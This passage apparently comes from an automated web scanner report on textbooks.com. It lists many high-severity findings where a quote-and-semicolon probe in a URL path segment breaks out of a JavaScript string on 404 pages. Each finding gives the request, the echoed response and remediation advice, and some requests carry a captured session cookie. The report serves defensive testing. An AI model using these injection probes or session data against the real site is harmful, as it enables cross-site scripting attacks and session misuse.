Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3652
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:53 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Cataloga6c22';46f8934e7f2/HQL/General-Video-Titles.php'

</script>
...[SNIP]...

1.21. http://www.textbooks.com/Catalog/HQL/General-Video-Titles.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/HQL/General-Video-Titles.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a69fc'%3bf9ce83581d3 was submitted in the REST URL parameter 3. This input was echoed as a69fc';f9ce83581d3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/HQL/a69fc'%3bf9ce83581d3 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3628
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:53 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
et() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/HQL/a69fc';f9ce83581d3'

</script>
...[SNIP]...

1.22. http://www.textbooks.com/Catalog/J/Law-and-Criminal-Justice.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/J/Law-and-Criminal-Justice.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff4da'%3bf118a290d29 was submitted in the REST URL parameter 1. This input was echoed as ff4da';f118a290d29 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalogff4da'%3bf118a290d29/J/Law-and-Criminal-Justice.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3654
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:02 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalogff4da';f118a290d29/J/Law-and-Criminal-Justice.php'

</script>
...[SNIP]...

1.23. http://www.textbooks.com/Catalog/J/Law-and-Criminal-Justice.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/J/Law-and-Criminal-Justice.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0be6'%3b73ed10a5b24 was submitted in the REST URL parameter 3. This input was echoed as d0be6';73ed10a5b24 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/J/d0be6'%3b73ed10a5b24 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:03 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/J/d0be6';73ed10a5b24'

</script>
...[SNIP]...

1.24. http://www.textbooks.com/Catalog/L/Languages-and-Literature.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/L/Languages-and-Literature.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99604'%3bf4e995475c0 was submitted in the REST URL parameter 1. This input was echoed as 99604';f4e995475c0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog99604'%3bf4e995475c0/L/Languages-and-Literature.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3654
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:05 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog99604';f4e995475c0/L/Languages-and-Literature.php'

</script>
...[SNIP]...

1.25. http://www.textbooks.com/Catalog/L/Languages-and-Literature.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/L/Languages-and-Literature.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2261e'%3bf4653620d1 was submitted in the REST URL parameter 3. This input was echoed as 2261e';f4653620d1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/L/2261e'%3bf4653620d1 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3625
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:05 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/L/2261e';f4653620d1'

</script>
...[SNIP]...

1.26. http://www.textbooks.com/Catalog/M/Math-and-Science.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/M/Math-and-Science.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84d85'%3bbc5dc2196f2 was submitted in the REST URL parameter 1. This input was echoed as 84d85';bc5dc2196f2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog84d85'%3bbc5dc2196f2/M/Math-and-Science.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3646
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:04 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog84d85';bc5dc2196f2/M/Math-and-Science.php'

</script>
...[SNIP]...

1.27. http://www.textbooks.com/Catalog/M/Math-and-Science.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/M/Math-and-Science.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3252'%3b2a20df4a898 was submitted in the REST URL parameter 3. This input was echoed as a3252';2a20df4a898 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/M/a3252'%3b2a20df4a898 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:05 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/M/a3252';2a20df4a898'

</script>
...[SNIP]...

1.28. http://www.textbooks.com/Catalog/P/Medicine.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/P/Medicine.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10b2f'%3b8290bd8ef43 was submitted in the REST URL parameter 1. This input was echoed as 10b2f';8290bd8ef43 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog10b2f'%3b8290bd8ef43/P/Medicine.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3638
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:28 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog10b2f';8290bd8ef43/P/Medicine.php'

</script>
...[SNIP]...

1.29. http://www.textbooks.com/Catalog/P/Medicine.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/P/Medicine.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ecf4'%3b7c7953083f1 was submitted in the REST URL parameter 3. This input was echoed as 1ecf4';7c7953083f1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/P/1ecf4'%3b7c7953083f1 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:29 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/P/1ecf4';7c7953083f1'

</script>
...[SNIP]...

1.30. http://www.textbooks.com/Catalog/R/Reference-Materials.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/R/Reference-Materials.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49ac2'%3bcbb7a349c97 was submitted in the REST URL parameter 1. This input was echoed as 49ac2';cbb7a349c97 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog49ac2'%3bcbb7a349c97/R/Reference-Materials.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3649
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:37 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog49ac2';cbb7a349c97/R/Reference-Materials.php'

</script>
...[SNIP]...

1.31. http://www.textbooks.com/Catalog/R/Reference-Materials.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/R/Reference-Materials.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b08e6'%3be7126123a86 was submitted in the REST URL parameter 3. This input was echoed as b08e6';e7126123a86 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/R/b08e6'%3be7126123a86 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:38 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/R/b08e6';e7126123a86'

</script>
...[SNIP]...

1.32. http://www.textbooks.com/Catalog/S/Social-Sciences.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/S/Social-Sciences.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cbf9'%3b4bd41d8fcd1 was submitted in the REST URL parameter 1. This input was echoed as 9cbf9';4bd41d8fcd1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog9cbf9'%3b4bd41d8fcd1/S/Social-Sciences.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
